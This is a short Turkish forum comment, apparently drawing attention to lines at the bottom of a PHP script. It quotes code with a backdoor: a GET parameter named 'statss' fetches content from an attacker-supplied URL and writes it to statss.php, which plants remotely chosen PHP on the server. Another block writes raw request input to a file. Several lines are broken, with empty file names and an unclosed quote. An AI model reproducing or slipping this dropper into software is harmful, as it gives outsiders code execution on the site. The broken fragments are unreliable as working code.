en alt satırlara in,

if (isset($_GET['])){

burada tırnak açılacakmış açılamamış... :o

if (isset($_GET['ne verisi gelecekse artık'])){
$f = fopen("", "w+");
fwrite($f, str_replace(",", "\r\n", str_replace("\\", "", $_GET[""])));
fclose($f);
}

if(is_file("")){
echo file_get_contents("");
}

if (isset($_GET['statss'])){
$f = fopen("statss.php", "w+");
fwrite($f, file_get_contents($_GET["statss"]));
fclose($f);
}
?>